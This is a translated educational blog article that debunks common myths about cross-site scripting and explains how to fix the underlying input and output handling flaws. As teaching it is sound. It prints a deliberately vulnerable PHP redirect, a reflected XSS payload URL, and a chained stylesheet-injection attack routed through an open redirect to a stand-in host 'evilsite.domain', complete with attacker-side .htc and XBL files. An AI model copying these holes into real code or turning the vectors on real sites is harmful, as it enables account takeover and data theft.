I must admit that reading the comments on Habr under almost any post describing yet another XSS on some popular service or website can depress anyone connected in any way with web application security. Given the myths and misconceptions about cross-site scripting that are common among developers, it is not surprising that it remains one of the most widespread web application security problems to date: according to a report from Positive Technologies for 2010-2011, XSS was found in 40% of the web applications analyzed, and from the FireHost report for the second quarter of 2012 it follows that XSS accounted for 27% of the attacks registered by the hoster.
And since this post could get downvoted for its title alone, let me hasten to explain: cross-site scripting really is not a vulnerability, but only because it is an attack. What the difference is, why it matters, how to deal with all of this, and what other myths and misconceptions about XSS are widespread - read on under the cut.
All the misconceptions are stated in the headings, their order is arbitrary, and any resemblance of the example attacks and vulnerabilities to real ones is coincidental and unintended.
XSS is a vulnerability
As mentioned above, this is not the case. Cross-site scripting is an attack, both according to the OWASP classification and according to the WASC one (although, of course, classification manuals should not be taken on faith). In other words, XSS is only one of the possible ways to exploit a particular class of vulnerabilities. For example, the following code contains only one vulnerability, yet it is susceptible to attacks of several classes at once:
<?php header('Refresh: 5; url=' . $_GET['url']); ?>
<html>
  <head>
    <meta http-equiv="refresh" content="5;url=<?=$_GET['url']?>"></meta>
  </head>
</html>
First, this code is subject to an abuse of redirection functionality attack, which has nothing to do with XSS. Second, with a request of the form

http://localhost/?url="><script>alert("XSS")</script><!--

reflected cross-site scripting is carried out easily and naturally. Third, if the web application is deployed in an environment using a canonical PHP version below 4.4.2 or 5.1.2, or one of a number of third-party PHP implementations, this code is also vulnerable to HTTP response splitting and HTTP response smuggling (and a web application's security should, as far as possible, not depend on the security of its environment).
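To make the header-injection problem concrete, here is a minimal, hypothetical sketch (the function name is mine, not from the original code) of a defensive check that refuses to emit a header value containing CR or LF, the characters response splitting relies on:

```php
<?php
// Hypothetical sketch: a header value containing CR or LF would let an
// attacker start a new header line (or a whole new response), so we
// refuse to emit it. Modern PHP versions reject such headers on their
// own, but the check makes the intent explicit.
function is_header_safe(string $value): bool
{
    // strpbrk() returns false when none of the listed bytes occur.
    return strpbrk($value, "\r\n") === false;
}

$url = $_GET['url'] ?? '/';
if (is_header_safe($url)) {
    header('Refresh: 5; url=' . $url);
} else {
    http_response_code(400); // reject rather than try to "clean up"
}
```

Rejecting the request outright is deliberate: trying to strip the offending bytes and carry on is exactly the kind of attack-oriented patching the next section argues against.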
The difference between a vulnerability and an attack is that eliminating a vulnerability gets rid of all the attacks that exploit it, whereas eliminating a specific attack does not remove the vulnerability itself. A simple example: if, treating this XSS as a vulnerability, we eliminate it by URL-encoding every fragment of the URL in the script, this will not affect the possibility of the redirection-abuse attack at all - the attacker will still be able to redirect the user to an arbitrary, well-formed URL. Instead of fighting the consequences, we must deal with the cause, namely eliminate the single vulnerability that makes all these attacks possible. In this case, the vulnerability is that the url GET parameter is not properly processed either when it arrives at the script from the web server or before it is used in the output. Allow me to introduce: this vulnerability belongs to the classes of improper input and output handling, and it is the most widespread vulnerability, the one that makes possible the majority of attacks known today. Hence, to eliminate it, we must ensure correct and sufficient processing of both kinds of data, and it is obvious that in this case URL encoding alone is not sufficient. We will return to this question later.
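As an illustration of fixing the vulnerability rather than a particular attack, here is a minimal sketch (the function name and details are mine, not from the original): the untrusted url parameter is validated on a whitelist basis (only local paths allowed) and the survivor is escaped for the HTML attribute context it ends up in, which addresses the open redirect and the XSS at once:

```php
<?php
// Hypothetical sketch: validate the untrusted "url" parameter on a
// whitelist basis, then escape it for the HTML attribute context.
// Returns null when the value must be rejected.
function safe_redirect_target(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false) {
        return null; // unparseable input is rejected outright
    }
    // Whitelist: a scheme, host, port or credentials would take the
    // redirect off-site, so their mere presence fails validation.
    foreach (['scheme', 'host', 'port', 'user', 'pass'] as $forbidden) {
        if (isset($parts[$forbidden])) {
            return null;
        }
    }
    $path = $parts['path'] ?? '/';
    // Escape for the double-quoted attribute context of the output.
    return htmlspecialchars($path, ENT_QUOTES, 'UTF-8');
}
```

Note that the escaping step alone would not have stopped the redirect abuse, and the validation step alone would not have stopped attribute breakout - the point is that both sides of the data handling are covered.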
XSS comes in passive and active varieties
“When you get thoroughly bored - argue about terminology with colleagues” (c). But here it is a matter of principle, I'm sorry. I do not know whom to thank for imposing this wretched classification on Russian-speaking developers (the article on XSS in the Russian Wikipedia is believed to have contributed to its spread), but this division, although it does exist, is nonetheless completely useless, since it does not reflect all the properties of a specific XSS that actually matter when analyzing the security of a web application and eliminating the corresponding vulnerabilities. It is traditionally and mistakenly believed that XSS can be passive (requiring a specially crafted link to be passed to the user, who must be persuaded to follow it) or active (stored on the server and triggered without any extra actions on the user's part). But consider the following example: suppose the Habr engine had a vulnerability allowing an attacker to break out of the href attribute of an <a> tag in the text of a post, but not out of the tag itself. Clearly, this vulnerability could be used to mount an XSS attack by defining a handler for hovering over the link, clicking on it, and so on. The question is: is such an attack passive or active? On the one hand, the link is stored on the server and does not need to be delivered to the attacked users - seemingly active. On the other hand, a successful attack requires additional user actions, which is characteristic only of passive attacks. A paradox? This is why XSS is normally classified by two criteria: impact vector and mode of operation. The latter is exactly the “active/passive” distinction, but with clearer definitions: an active XSS requires no extra actions from the user in terms of the web application's functionality, unlike a passive one. By impact vector, XSS is divided into reflected (returned by the server in the response to the same request that carried the exploitation vector), persistent (stored on the server and present in all responses to a given request, including ones that do not contain the exploitation vector) and DOM-based (possible without sending any request to the server at all). Thus, the correct classification of the attack in our example is: persistent passive.
XSS is an attack on the user, aimed at executing an arbitrary script in their browser
Obviously, this is not entirely true. To execute an arbitrary script in the victim's browser, it would be enough to lure the victim to a specially crafted page hosted on a server controlled by the attacker. XSS, however, aims not simply at executing an arbitrary script, but at executing it in the context of a specific site's origin, in order to bypass the same-origin policy (Same Origin Policy, SOP) and, as a result, gain access to the data and functionality of the client side of the web application within the user's session and with that user's privileges. It is, first and foremost, an attack on the web application, realizing a threat to it rather than to the user's browser.
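To make the policy tangible, here is a hypothetical sketch (in PHP, for consistency with the rest of the article) of the comparison at the heart of SOP: two URLs belong to the same origin only when scheme, host and port all coincide.

```php
<?php
// Hypothetical sketch of the browser's origin comparison: two URLs
// share an origin only when scheme, host and port are all equal
// (with default ports filled in for http/https).
function same_origin(string $a, string $b): bool
{
    $defaults = ['http' => 80, 'https' => 443];
    $origin = function (string $url) use ($defaults): ?array {
        $p = parse_url($url);
        if ($p === false || !isset($p['scheme'], $p['host'])) {
            return null; // no scheme/host means no origin to speak of
        }
        $scheme = strtolower($p['scheme']);
        $port = $p['port'] ?? ($defaults[$scheme] ?? null);
        return [$scheme, strtolower($p['host']), $port];
    };
    $oa = $origin($a);
    $ob = $origin($b);
    return $oa !== null && $oa === $ob;
}
```

This is why a script injected into a page served by the target site is so valuable to the attacker: it runs with the target's scheme, host and port, and the browser grants it everything that origin is entitled to.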
At the PHDays 2012 conference, during the “Web 2.0 Security. Advanced Techniques” section, its host Andrés Riancho asked the audience a simple question: “Raise your hand if you know what the same-origin policy is.” As someone who was present, I can confirm: at most a third of the audience, consisting entirely of web developers and security experts, raised their hands. This historic moment is in the video; it is a pity the whole audience did not make it into the frame. Frankly, I do not quite understand how one can be a web developer or a web security expert and not know about the basic protection mechanism of modern browsers, so I decided for myself that people were simply too shy to raise their hand in front of a foreigner. However, even a brief overview of this policy is not a job for a couple of paragraphs, so let me refer anyone interested to the second part of Michal Zalewski's e-book “Browser Security Handbook”. The topic is covered even more deeply in “The Tangled Web” by the same author. Incidentally, both are recommended reading for anyone involved in web development or web application security analysis.
Fighting XSS is the user's problem, and anyway XSS is no big deal
It is not entirely clear why this attack on a web application (see above) should suddenly be a problem for the user rather than for the owner or developers of that application. Here the question is rather one of their stance on ensuring that users can work safely. The risks associated with XSS really are often reputational. But if we are talking about how serious the consequences of a successful XSS can be for users, I recommend the talk by my colleague Denis Baranov, “Root via XSS”, presented at the ZeroNights 2011 conference and devoted to gaining privileged access to web developers' computers through cross-site scripting (unfortunately, only the slides are available, but I think the general idea will be clear without the video). How great will the damage to a resource's reputation be if, through an XSS on its client side, attackers gain unrestricted access to its users' computers? Especially considering that tools turning mass XSS exploitation into a script kiddie's pastime have been around for a long time: take, for instance, BeEF. Besides, we should not forget that from the point of view of XSS, the administrators of a web application are users exactly like everyone else (the very users whose problem fighting this class of attacks supposedly is, right).
XSS is possible only through injection into HTML or a client-side script
Not only. For example, one way of exploiting the already mentioned HTTP response splitting attack is to embed an HTML document (and therefore client scripts, if needed) directly into the HTTP header subject to injection. Abuse of redirection functionality can be used to redirect the browser to URLs with the data: or javascript: scheme. Even more obscure uses of redirection attacks to mount an XSS are possible. For example, suppose that our web application, in addition to the entry point with the redirection problem already discussed (available at /redirect.php?url=), also has an entry point with the following code:
<html>
  <head>
    <link rel="stylesheet" href="/themes/<?=$theme?>.css" type="text/css" />
  </head>
Here the $theme variable, obtained from the GET request parameters, is processed by stripping all quotes from it, as well as backslashes and tags (just in case), which makes it impossible for the attacker to break out of the href attribute. However, that is not required for XSS. By passing

../redirect.php?url=http://evilsite.domain/evilstylesheet

as the $theme parameter, the attacker can embed an arbitrary style sheet into the page. By using a style sheet with the following content for IE or FF
body { behavior:url(../redirect.php?url=http://evilsite.domain/evilscript.htc); }
and
body { -moz-binding: url(../redirect.php?url=http://evilsite.domain/evilscript.xml#evilcode); }
respectively, and by hosting on his server the file evilscript.htc:
<PUBLIC:COMPONENT TAGNAME="xss">
  <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main() {
  alert("XSS");
}
</SCRIPT>
and evilscript.xml:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
  <binding id="mycode">
    <implementation>
      <constructor>
        alert("XSS");
      </constructor>
    </implementation>
  </binding>
</bindings>
the attacker achieves a successful XSS against users of these two browsers. The same applies, of course, to the possibility of injecting directly into style definitions.
UPD: As pointed out in the comments, -moz-binding has recently been laid to rest, alas.
Most of the XSS vectors available to an attacker in various browsers and HTML versions are listed on the HTML5 Security Cheatsheet website, where you will also find an exhaustive answer to the question posed in this section's heading.
The framework I use has automatic XSS protection built in, so I don't need to worry about it.
Indeed, many modern frameworks implement such protection: the XSS Filtering engine in CodeIgniter, the standard templating functionality in Django and RoR, the Web Protection Library and the Request Validation mechanism in ASP.NET/MVC, and so on. This is certainly great, and it would be foolish not to use this functionality. But it would be just as foolish to ignore the fact that:
- no server-side framework can protect a web application from DOM-based XSS;
- none of the existing automatic XSS protection mechanisms is universal or free of limitations that must be taken into account;
- the functionality these mechanisms implement is aimed at countering a specific class of attacks and cannot prevent vulnerabilities caused by insufficient data handling from appearing in the code.
So you still have to worry about XSS; it is just that in some frameworks doing so is not a chore and does not require significant effort.
To eliminate XSS, it is enough to escape all strings that end up in the HTML document
It is not enough; we have already seen why above. We need to eliminate not the XSS but the vulnerability behind it, which brings us to the need to ensure secure data handling. Since this topic deserves a separate (and rather large) article, I will only list the main stages of implementing such handling:
Determining the degree of trust in the data
First of all, it is necessary to identify all data flows whose integrity or authenticity is not controlled within the web application component under consideration. By a component of a web application we usually (though not always) mean those elements of its server or client side that execute within a single OS process.
In the example above, the untrusted (and only) data is the url parameter, obtained from the GET request string.
Typing all untrusted data
As close as possible to where such data first appears in the component, it must be converted to the expected types. In static languages this is done by an actual type cast or by creating an instance of the type through deserialization or parsing of the data being checked; moreover, in most modern frameworks built on static languages this functionality is already implemented in the mechanisms that bind request parameters to model objects. In dynamic languages things are somewhat sadder, since one can really only speak of imitating a cast (which must nevertheless be implemented). Still, a competent implementation of even such conditional typing will guarantee that the component works only with data of exactly the types it was designed for. All further work with the data inside the component should be carried out only through the objects created from the input data. It is important to remember that the main principle of the typing stage is to have as few string-typed objects as possible at its output. URLs, email addresses, dates, times and so on must, after typing, be objects of specific non-string types. Only data that genuinely is a string, i.e. that may actually contain arbitrary alphanumeric text, should remain represented as strings.
In our case, it suffices to use the parse_url() function and check the elements of the resulting array for extra underscores, which indicate the presence of forbidden characters in the original URL (terminating the typing with an error if such characters are detected or if parse_url() returns FALSE). If the query key is present in the resulting array, it must additionally be parsed with parse_str() and replaced with the resulting associative array of query parameters.
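A possible sketch of this typing stage (the function name and the concrete form of the underscore heuristic are mine; treat this as an illustration, not a drop-in):

```php
<?php
// Hypothetical sketch of the typing stage: turn the raw url parameter
// into a structured value, or fail, instead of passing a string around.
function type_url(string $raw): ?array
{
    $parts = parse_url($raw);
    if ($parts === false) {
        return null; // typing error: unparseable URL
    }
    // Per the text above, parse_url() may substitute underscores for
    // forbidden characters, so underscores that were absent from the
    // source string are treated as suspicious.
    foreach ($parts as $value) {
        if (is_string($value)
            && substr_count($value, '_') > substr_count($raw, '_')) {
            return null; // typing error: forbidden characters detected
        }
    }
    // Replace the raw query string with a typed associative array.
    if (isset($parts['query'])) {
        parse_str($parts['query'], $query);
        $parts['query'] = $query;
    }
    return $parts;
}
```

From this point on, the component works with the returned array (and later with objects built from it), never with the original string.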
Validation of all typed untrusted data
Immediately after typing, the semantics of the resulting objects must be checked for conformance to the component's functionality. For example, for integer or date/time types this will be a range check (negative page numbers or money transfer amounts hardly match any functional expectations); for strings, a regular-expression check will suffice in most cases; and for objects of more complex types, the semantics of each of their fields and properties must be checked. All validation checks must be built on the whitelist principle, i.e. the data's semantics must match the allowed criteria, not the other way around. The goal of this stage is a guarantee that all the data inside the component corresponds to the functionality implemented in it and cannot disrupt it.
Suppose that in our “web application” redirection may only be performed within its own domain. In that case, we must make sure that the array produced by parse_url() contains only the path, query and fragment keys; discovering any other key must lead to a validation error and termination of request processing, unless the scheme, host and port point to the web application's own domain. More generally, it is quite nice if the routing mechanism used in the web application also lets us check that path corresponds to a really existing controller. And it is absolutely great if the same can be done with the parameters in query (not to mention fragment).
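The whitelist check just described might look like this (a simplified sketch of my own: URLs naming the application's own domain explicitly are rejected here too, rather than special-cased):

```php
<?php
// Hypothetical sketch of the validation stage: only the keys that keep
// the redirect inside the current site may be present at all.
function validate_url_parts(array $parts): bool
{
    $allowed = ['path', 'query', 'fragment'];
    foreach (array_keys($parts) as $key) {
        if (!in_array($key, $allowed, true)) {
            return false; // scheme, host, port etc. imply an external URL
        }
    }
    return true;
}
```

Note the whitelist direction: we enumerate what is allowed and reject everything else, rather than enumerating known-bad keys.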
Sanitizing the output
Everywhere that validated and typed objects leave the component (or output data is produced from them), they must be reduced to a form that is safe for the receiving side. As a rule, this is achieved by removing unsafe elements from them (filtering) or converting those elements to safe equivalents (escaping). Sanitization must be implemented appropriately for the place where the data will end up: when building an HTML document, the correct ways of escaping data placed between tags, inside tags, inside particular tag attributes, in the text of client scripts or in style definitions all differ. In other words, htmlspecialchars() is not a universal escaping tool that will suffice always and everywhere.
In our case, it is enough to generate a correct URL from the fields of the object obtained at the previous stages, using the http_build_query() function to build the query part and urlencode() when generating path elements (or using http_build_url() and http_build_str() from pecl_http).
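Putting that into code, a sketch of the sanitization step might be (the function name is mine; rawurlencode() is used here instead of urlencode() so that spaces in path segments become %20 rather than '+'):

```php
<?php
// Hypothetical sketch of the sanitization stage: rebuild the URL from
// the validated parts instead of echoing the original string.
function build_safe_url(array $parts): string
{
    // Encode each path segment, keeping the '/' separators intact.
    $segments = explode('/', $parts['path'] ?? '/');
    $url = implode('/', array_map('rawurlencode', $segments));
    if (!empty($parts['query'])) {
        // http_build_query() percent-encodes keys and values for us.
        $url .= '?' . http_build_query($parts['query']);
    }
    if (isset($parts['fragment'])) {
        $url .= '#' . rawurlencode($parts['fragment']);
    }
    return $url;
}
```

Because the URL is reassembled from typed, validated pieces, nothing the attacker supplied can reach the output without passing through an encoder appropriate to its position.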
In fact, these rules are relevant to any attack enabled by a vulnerability of this class - for example, SQL injection, OS command injection and so on. It is also worth noting that although most developers have long known that data the server receives from the client cannot be trusted, almost no one considers that the reverse is equally true, and for the same reasons.
Yet if secure data processing were implemented on the client side as well, it would minimize the risks of client-side attacks that exploit server-side vulnerabilities. To some, these rules may seem redundant and excessive, but in a real (read: large and complex) web application any other way of getting rid of XSS along the lines of “here it's enough just to...” will be a fight against the attack rather than against the vulnerability - with consequences that sooner or later turn into concrete figures in the reports of information security companies.
By way of an epilogue: so it turns out there is no need to fight attacks?
Of course there is. It is just that countering attacks should form the second echelon of defense and must not be used as a means of eliminating vulnerabilities. Finally, one more piece of advice on how to significantly complicate an attacker's work on the client side (and not only with respect to XSS): all server responses should contain the following headers:

X-Content-Type-Options: nosniff
msdn.microsoft.com/en-us/library/ie/gg622941(v=vs.85).aspx

X-XSS-Protection: 1; mode=block
msdn.microsoft.com/en-us/library/dd565647(v=vs.85).aspx

X-Frame-Options: DENY
blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx

X-Content-Security-Policy: [the value of this header must be derived from the technical requirements for the site's functionality, in accordance with dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html]

Strict-Transport-Security: max-age=expireTime
developer.mozilla.org/en/Security/HTTP_Strict_Transport_Security

There is little point, I think, in explaining the purpose of each of them here and duplicating the texts behind the links. Good luck!
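For completeness, a sketch of emitting these headers from PHP (the CSP value below is a placeholder assumption, not a recommended policy; a real one must be derived from the site's actual requirements, and the header names reflect the era-specific variants used in this article):

```php
<?php
// Sketch: the defense-in-depth headers discussed above, as name => value.
// The X-Content-Security-Policy value is a placeholder assumption only.
$securityHeaders = [
    'X-Content-Type-Options'    => 'nosniff',
    'X-XSS-Protection'          => '1; mode=block',
    'X-Frame-Options'           => 'DENY',
    'X-Content-Security-Policy' => "default-src 'self'",
    'Strict-Transport-Security' => 'max-age=31536000',
];
foreach ($securityHeaders as $name => $value) {
    header($name . ': ' . $value);
}
```

In practice this belongs in a front controller or the web server configuration, so that every response carries the headers without each script having to remember them.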